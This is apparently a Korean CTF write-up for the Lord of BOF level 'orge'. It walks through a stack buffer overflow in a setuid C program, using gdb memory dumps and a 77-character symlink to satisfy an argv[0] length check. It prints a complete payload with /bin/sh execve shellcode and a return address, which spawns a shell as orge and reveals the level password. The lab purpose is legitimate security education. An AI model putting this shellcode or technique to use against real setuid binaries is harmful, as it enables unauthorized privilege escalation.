7. darkelf → orge

[darkelf@localhost darkelf]$ cat -n orge.c 
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - orge
     4	        - check argv[0]
     5	*/
     6	
     7	#include <stdio.h>
     8	#include <stdlib.h>
     9	
    10	extern char **environ;
    11	
    12	main(int argc, char *argv[])
    13	{
    14		char buffer[40];
    15		int i;
    16	
    17		if(argc < 2){
    18			printf("argv error\n");
    19			exit(0);
    20		}
    21	
    22		// here is changed!
    23		if(strlen(argv[0]) != 77){
    24	                printf("argv[0] error\n");
    25	                exit(0);
    26		}
    27	
    28		// egghunter 
    29		for(i=0; environ[i]; i++)
    30			memset(environ[i], 0, strlen(environ[i]));
    31	
    32		if(argv[1][47] != '\xbf')
    33		{
    34			printf("stack is still your friend.\n");
    35			exit(0);
    36		}
    37	
    38		// check the length of argument
    39		if(strlen(argv[1]) > 48){
    40			printf("argument is too long!\n");
    41			exit(0);
    42		}
    43	
    44		strcpy(buffer, argv[1]); 
    45		printf("%s\n", buffer);
    46	
    47	        // buffer hunter
    48	        memset(buffer, 0, 40);
    49	}

22~26번 줄을 보면, argv[0]의 길이가 77이 되어야 한다고 나와있습니다.

argv[0]는 실행 파일명이죠?

 

우선, 심볼릭 링크를 이용해서 길이를 조절해 봅시다.

심볼릭 링크는 어떠한 파일에 원본 링크를 걸어, 원본 파일을 직접 실행시키는것과 같은 효과를 냅니다.

 

 

테스트를 통해 과연 실행 파일명이 성공적으로 바뀌는지 볼까요?

 

 

 

<원본파일 직접 실행할 경우>

orge파일은 디버깅 권한이 없으므로, 복사본 test로 진행하였습니다.

0x8048523 <main+35>:	mov    %eax,DWORD PTR [%ebp+12]
0x8048526 <main+38>:	mov    %edx,DWORD PTR [%eax]
0x8048528 <main+40>:	push   %edx
0x8048529 <main+41>:	call   0x80483f0 <strlen>
0x804852e <main+46>:	add    %esp,4
0x8048531 <main+49>:	mov    %eax,%eax
0x8048533 <main+51>:	cmp    %eax,77
0x8048536 <main+54>:	je     0x8048550 <main+80>
0x8048538 <main+56>:	push   0x804869c
0x804853d <main+61>:	call   0x8048410 <printf>
0x8048542 <main+66>:	add    %esp,4
0x8048545 <main+69>:	push   0
0x8048547 <main+71>:	call   0x8048420 <exit>
0x804854c <main+76>:	add    %esp,4

(gdb) x/40wx $ebp   
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048450
0xbffffb38:	0x00000000	0x08048471	0x08048500	0x00000002
0xbffffb48:	0xbffffb64	0x08048390	0x0804866c	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc5d
0xbffffb68:	0xbffffc70	0x00000000	0xbffffc8f	0xbffffcb1
0xbffffb78:	0xbffffcbb	0xbffffcc9	0xbffffce8	0xbffffcf8
0xbffffb88:	0xbffffd10	0xbffffd2d	0xbffffd38	0xbffffd46
0xbffffb98:	0xbffffd89	0xbffffd9c	0xbffffdb1	0xbffffdc1
0xbffffba8:	0xbffffdce	0xbffffded	0xbffffe06	0xbffffe11
(gdb) x/s 0xbffffc5d
0xbffffc5d:	 "/home/darkelf/test"

 

"/home/darkelf/test"라는 문자열이 argv[0]에 전달되었네요.

(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/darkelf/test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 

 

 

 

<심볼릭 링크를 이용하여 실행할 경우>

 

ln -s {원본 파일} {새파일}

다음과같이 심볼릭 링크가 걸립니다.

[darkelf@localhost darkelf]$ ln -s test 6ix9ine  
[darkelf@localhost darkelf]$ ls -lv 
total 36
lrwxrwxrwx    1 darkelf  darkelf         4 Dec 13 01:23 6ix9ine -> test
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c
-rwsr-sr-x    1 darkelf  darkelf     12700 Dec 13 00:47 test

(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/darkelf/6ix9ine AAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x8048523 in main ()
(gdb) x/40wx $ebp
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048450
0xbffffb38:	0x00000000	0x08048471	0x08048500	0x00000002
0xbffffb48:	0xbffffb64	0x08048390	0x0804866c	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc5b
0xbffffb68:	0xbffffc71	0x00000000	0xbffffc8c	0xbffffcae
0xbffffb78:	0xbffffcb8	0xbffffcc6	0xbffffce5	0xbffffcf5
0xbffffb88:	0xbffffd0d	0xbffffd2a	0xbffffd35	0xbffffd43
0xbffffb98:	0xbffffd86	0xbffffd99	0xbffffdae	0xbffffdbe
0xbffffba8:	0xbffffdcb	0xbffffdea	0xbffffe03	0xbffffe0e
(gdb) x/s 0xbffffc5b
0xbffffc5b:	 "/home/darkelf/6ix9ine"

머.. 당연한 결과지만 바뀌네요~ 굳.

 

 

그럼 argv[0]의 길이를 77로 맞추고(저는 /home/darkelf/~ 식으로 입력해볼게요)

argv[1]에 올려놓은 쉘코드를 실행시켜봅시다.

 

 

[darkelf@localhost darkelf]$ `python -c 'print "ln -s test " + "A"*63'`
[darkelf@localhost darkelf]$ ls -l 
total 36
lrwxrwxrwx    1 darkelf  darkelf         4 Dec 13 01:32 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> test
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c
-rwsr-sr-x    1 darkelf  darkelf     12700 Dec 13 00:47 test
[darkelf@localhost darkelf]$ /home/darkelf/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA hihihihi
stack is still your friend.

와우.. 크고 아름답네요

argv[0]길이 부분은 성공적으로 통과합니다

 

 

공격 코드
argv[0]	argv[1]
/home/darkelf/A(*63)	shellcode(24byte)	B(dummy 20byte)	ret(argv[1] addr)

 

 

페이로드를 보내고 코어 파일을 통해 argv[1] addr를 찾아내봅시다

[darkelf@localhost darkelf]$ `python -c 'print "/home/darkelf/"+"A"*63+" \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "B"*20 + "\xd3\xfb\xff\xbf"'`
1󿿐h//shh/bin⏓ᙰ
              ̀BBBBBBBBBBBBBBBBBBBBԻÿ¿
Segmentation fault (core dumped)

 

 

혹시 argv[1]위치를 찾는 과정이 궁금하신분은 포스팅 해뒀으니 참고하세요

2018/07/23 - [wargame write-up/Lord of BOF] - 2. gremlin => cobolt

 

(gdb) x/40wx $esp
0xbffffa2c:	0x08048471	0x08048500	0x00000002	0xbffffa54
0xbffffa3c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa4c
0xbffffa4c:	0x40013e90	0x00000002	0xbffffb50	0xbffffb9e
0xbffffa5c:	0x00000000	0xbffffbcf	0xbffffbe1	0xbffffbf9
0xbffffa6c:	0xbffffc18	0xbffffc3a	0xbffffc47	0xbffffe0a
0xbffffa7c:	0xbffffe29	0xbffffe46	0xbffffe5b	0xbffffe7a
0xbffffa8c:	0xbffffe85	0xbffffe9e	0xbffffeae	0xbffffeb6
0xbffffa9c:	0xbffffec0	0xbffffed0	0xbffffede	0xbffffeec
0xbffffaac:	0xbffffefd	0xbfffff08	0xbfffff1b	0xbfffff5e
0xbffffabc:	0x00000000	0x00000003	0x08048034	0x00000004
(gdb) x/40wx 0xbffffb9e
0xbffffb9e:	0x6850c031	0x68732f2f	0x69622f68	0x50e3896e
0xbffffbae:	0x99e18953	0x80cd0bb0	0x42424242	0x42424242
0xbffffbbe:	0x42424242	0x42424242	0x42424242	0xbffffbd3
0xbffffbce:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbde:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbee:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbfe:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc0e:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc1e:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc2e:	0x00000000	0x00000000	0x00000000	0x00000000

 

마지막으로 orge파일과 심볼릭 링크를 연결하여 찾아낸 argv[1] addr를 적용시킨 페이로드를 입력해주면

요로케 성공적으로 쉘이 실행됩니다.

 

[darkelf@localhost darkelf]$ `python -c 'print "rm " + "A"*63'`
[darkelf@localhost darkelf]$ `python -c 'print "ln -s orge " + "A"*63'`
[darkelf@localhost darkelf]$ ls -l
total 100
lrwxrwxrwx    1 darkelf  darkelf         4 Dec 13 01:43 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge
-rw-------    1 darkelf  darkelf     61440 Dec 13 01:41 core
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c
-rwsr-sr-x    1 darkelf  darkelf     12700 Dec 13 00:47 test
[darkelf@localhost darkelf]$ `python -c 'print "/home/darkelf/"+"A"*63+" \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "B"*20 + "\x9e\xfb\xff\xbf"'`
1󿿐h//shh/bin⏓ᙰ
              ̀BBBBBBBBBBBBBBBBBBBB 
bash$ whoami
orge
bash$ my-pass
euid = 507
timewalker